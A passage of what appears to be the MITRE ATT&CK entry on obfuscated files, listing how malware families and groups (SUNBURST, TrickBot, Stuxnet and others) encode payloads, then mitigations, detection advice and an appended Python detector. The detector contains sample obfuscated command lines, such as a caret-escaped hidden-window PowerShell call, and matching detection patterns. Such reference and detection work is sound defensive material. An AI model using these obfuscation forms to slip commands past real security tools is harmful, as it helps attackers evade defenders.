S0074 | Sakula | Sakula uses single-byte XOR obfuscation to obfuscate many of its files.[308] |
S0370 | SamSam | SamSam has been seen using AES or DES to encrypt payloads and payload components.[309][310] |
G0034 | Sandworm Team | Sandworm Team has used Base64 encoding within malware variants. Sandworm Team has also used ROT13 encoding, AES encryption and compression with the zlib library for their Python-based backdoor.[311][312] |
S0461 | SDBbot | SDBbot has the ability to XOR the strings for its installer component with a hardcoded 128-byte key.[313] |
S0345 | Seasalt | |
S0596 | ShadowPad | ShadowPad has encrypted a virtual file system and various files.[315] |
S0140 | Shamoon | |
S0450 | SHARPSTATS | SHARPSTATS has used base64 encoding and XOR to obfuscate PowerShell scripts.[278] |
S0444 | ShimRat | ShimRat has been delivered as a package that includes compressed DLL and shellcode payloads within a .dat file.[230] |
S0445 | ShimRatReporter | ShimRatReporter encrypted gathered information with a combination of shifting and XOR using a static key.[230] |
S0063 | SHOTPUT | SHOTPUT is obscured using XOR encoding and appended to a valid GIF file.[317][318] |
S0589 | Sibot | |
G0121 | Sidewinder | Sidewinder has used base64 encoding and ECDH-P256 encryption for scripts and files.[319][320][321] |
G0091 | Silence | Silence has used environment variable string substitution for obfuscation.[322] |
S0623 | Siloscape | Siloscape itself is obfuscated and uses obfuscated API calls.[323] |
S0468 | Skidmap | |
S0633 | Sliver | |
S0226 | Smoke Loader | Smoke Loader uses a simple one-byte XOR method to obfuscate values in the malware.[327][328] |
S0649 | SMOKEDHAM | The SMOKEDHAM source code is embedded in the dropper as an encrypted string.[329] |
S0627 | SodaMaster | SodaMaster can use "stackstrings" for obfuscation.[104] |
S0615 | SombRAT | SombRAT can encrypt strings with XOR-based routines and use a custom AES storage format for plugins, configuration, C2 domains, and harvested data.[280][128][129] |
S0516 | SoreFang | SoreFang has the ability to encode and RC6 encrypt data sent to C2.[330] |
S0374 | SpeakUp | |
S0390 | SQLRat | SQLRat has used a character insertion obfuscation technique, making the script appear to contain Chinese characters.[332] |
S0380 | StoneDrill | StoneDrill has obfuscated its module with an alphabet-based table or XOR encryption.[333] |
S0142 | StreamEx | StreamEx obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data.[334] |
S0491 | StrongPity | StrongPity has used encrypted strings in its dropper component.[335][336] |
S0603 | Stuxnet | Stuxnet uses encrypted configuration blocks and writes encrypted files to disk.[337] |
S0559 | SUNBURST | SUNBURST strings were compressed and encoded in Base64.[338] SUNBURST also obfuscated collected system information using a FNV-1a + XOR algorithm.[339] |
S0562 | SUNSPOT | SUNSPOT encrypted log entries it collected with the stream cipher RC4 using a hard-coded key. It also uses AES128-CBC encrypted blobs for SUNBURST source code and data extracted from the SolarWinds Orion |
S0578 | SUPERNOVA | |
S0242 | SynAck | SynAck payloads are obfuscated prior to compilation to inhibit analysis and/or reverse engineering.[342][343] |
S0663 | SysUpdate | SysUpdate can encrypt and encode its configuration file.[263] |
G0092 | TA505 | TA505 has password-protected malicious Word documents and used base64 encoded PowerShell commands.[344][345][346] |
G0127 | TA551 | TA551 has used obfuscated variable names in a JavaScript configuration file.[347] |
S0011 | Taidoor | Taidoor can use encrypted string blocks for obfuscation.[348] |
S0467 | TajMahal | TajMahal has used an encrypted Virtual File System to store plugins.[349] |
G0139 | TeamTNT | TeamTNT has encrypted its binaries via AES.[350] TeamTNT has also encoded files using Base64.[351] |
S0560 | TEARDROP | TEARDROP created and read from a file with a fake JPG header, and its payload was encrypted with a simple rotating XOR cipher.[339][352][286] |
G0027 | Threat Group-3390 | A Threat Group-3390 tool can encrypt payloads using XOR. Threat Group-3390 malware is also obfuscated using Metasploit's shikata_ga_nai encoder as well as compressed with LZNT1 compression.[353][354][355] |
S0665 | ThreatNeedle | ThreatNeedle has been compressed and obfuscated using RC4, AES, or XOR.[356] |
S0131 | TINYTYPHON | TINYTYPHON has used XOR with 0x90 to obfuscate its configuration file.[357] |
S0678 | Torisma | |
G0134 | Transparent Tribe | Transparent Tribe has dropped encoded executables on compromised hosts.[358] |
S0266 | TrickBot | TrickBot uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files.[359] |
S0609 | TRITON | TRITON encoded the two inject.bin and imain.bin payloads.[360] |
S0094 | Trojan.Karagany | Trojan.Karagany can base64 encode and AES-128-CBC encrypt data prior to transmission.[361] |
G0081 | Tropic Trooper | Tropic Trooper has encrypted configuration files.[362][363] |
S0647 | Turian | |
G0010 | Turla | Turla has used encryption (including salted 3DES via PowerSploit's |
S0263 | TYPEFRAME | APIs and strings in some TYPEFRAME variants are RC4 encrypted. Another variant is encoded with XOR.[364] |
S0333 | UBoatRAT | UBoatRAT encrypts instructions in the payload using a simple XOR cipher.[365] |
S0386 | Ursnif | Ursnif has used an XOR-based algorithm to encrypt Tor clients dropped to disk.[366] Ursnif droppers have also been delivered as password-protected zip files that execute base64 encoded PowerShell commands.[367] |
S0136 | USBStealer | Most strings in USBStealer are encrypted using 3DES and XOR and reversed.[368] |
S0476 | Valak | Valak has the ability to base64 encode and XOR encrypt strings.[369][347][370] |
S0257 | VERMIN | VERMIN is obfuscated using the obfuscation tool called ConfuserEx.[371] |
S0180 | Volgmer | A Volgmer variant is encoded using a simple XOR cipher.[372] |
S0612 | WastedLocker | The WastedLocker payload includes encrypted strings stored within the .bss section of the binary file.[373] |
S0579 | Waterbear | Waterbear has used RC4 encrypted shellcode and encrypted functions.[374] |
S0689 | WhisperGate | WhisperGate can Base64 encode strings, store downloaded files in reverse byte order, and use the Eazfuscator tool to obfuscate its third stage.[375][376] |
G0107 | Whitefly | |
G0112 | Windshift | Windshift has used string encoding with floating point calculations.[378] |
S0466 | WindTail |
WindTail can be delivered as a compressed, encrypted, and encoded payload.[379] |
S0430 | Winnti for Linux |
Winnti for Linux can encode its configuration file with single-byte XOR encoding.[380] |
S0141 | Winnti for Windows |
Winnti for Windows has the ability to encrypt and compress its payload.[381] |
G0102 | Wizard Spider |
Wizard Spider used Base64 encoding to obfuscate an Empire service and PowerShell commands.[382][383] |
S0117 | XTunnel |
A version of XTunnel introduced in July 2015 obfuscated the binary using opaque predicates and other techniques in a likely attempt to obfuscate it and bypass security products.[384] |
S0388 | YAHOYAH |
YAHOYAH encrypts its configuration file using a simple algorithm.[385] |
S0230 | ZeroT | |
S0330 | Zeus Panda |
Zeus Panda encrypts strings with XOR and obfuscates the macro code from the initial payload. Zeus Panda also encrypts all configuration and settings in AES and RC4.[387][388] |
S0672 | Zox |
ID | Mitigation | Description |
---|---|---|
M1049 | Antivirus/Antimalware |
Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after they have been processed/interpreted. [390]
M1040 | Behavior Prevention on Endpoint |
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent execution of potentially obfuscated scripts. [391] |
ID | Data Source | Data Component |
---|---|---|
DS0017 | Command | Command Execution |
DS0022 | File | File Creation |
DS0022 | File | File Metadata |
DS0009 | Process | Process Creation |
Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).
Flag and analyze commands containing indicators of obfuscation and known suspicious syntax, such as uninterpreted escape characters like `^` and `"`. Windows Sysmon and Event ID 4688 display command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. [392] [5] [393]
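Detection logic for the command-line indicators described above, as an added example that is not part of the original page: it scores Sysmon/4688-style CommandLine values for caret escapes, mid-token quote splitting and Base64-encoded PowerShell, and normalizes them so plain signatures can match. The sample records, the caret threshold and the function names are constructed assumptions.

```python
import base64
import re

# Constructed sample CommandLine values in the style of Sysmon Event ID 1 and
# Security Event ID 4688 records; they are not taken from the original page.
ENCODED_BLOB = base64.b64encode("Get-Process".encode("utf-16le")).decode()
SAMPLE_COMMAND_LINES = [
    r"C:\Windows\System32\cmd.exe /c dir C:\Users",
    r"cmd.exe /c p^o^w^e^r^s^h^e^l^l -nop -w hidden",
    r'cmd.exe /c "w""hoa""mi"',
    f"powershell.exe -NoP -NonI -EncodedCommand {ENCODED_BLOB}",
]

CARET_THRESHOLD = 3  # assumed: one or two carets are common for escaping & or |
SPLIT_QUOTE_RE = re.compile(r'[A-Za-z]"+[A-Za-z]')  # quotes inside a single token
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)

def normalize(cmdline: str) -> str:
    """Undo cmd.exe caret escapes ('^x' -> 'x', '^^' -> '^') and mid-token
    quote splitting so that plain signatures can match the intended command."""
    without_carets = re.sub(r"\^(.)", r"\1", cmdline)
    return re.sub(r'(?<=\w)"+(?=\w)', "", without_carets)

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (Base64 of UTF-16LE), else None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # not a real blob; ignore
        return None

def analyze(cmdline: str) -> dict:
    """Score one command line for the escape-character and encoding indicators."""
    carets = cmdline.count("^")
    split_quotes = bool(SPLIT_QUOTE_RE.search(cmdline))
    decoded = decode_encoded_command(cmdline)
    return {
        "carets": carets,
        "split_quotes": split_quotes,
        "decoded": decoded,
        "normalized": normalize(cmdline),
        "suspicious": carets >= CARET_THRESHOLD or split_quotes or decoded is not None,
    }

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(analyze(line))
```

The normalized form is what a signature or allow-list should be matched against; the raw form is what a caret- or quote-obfuscated command looks like in the 4688 record.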
Obfuscation used in payloads for Initial Access can be detected on the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection.
The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliances, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The system that raised the alert should be investigated thoroughly beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detection will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.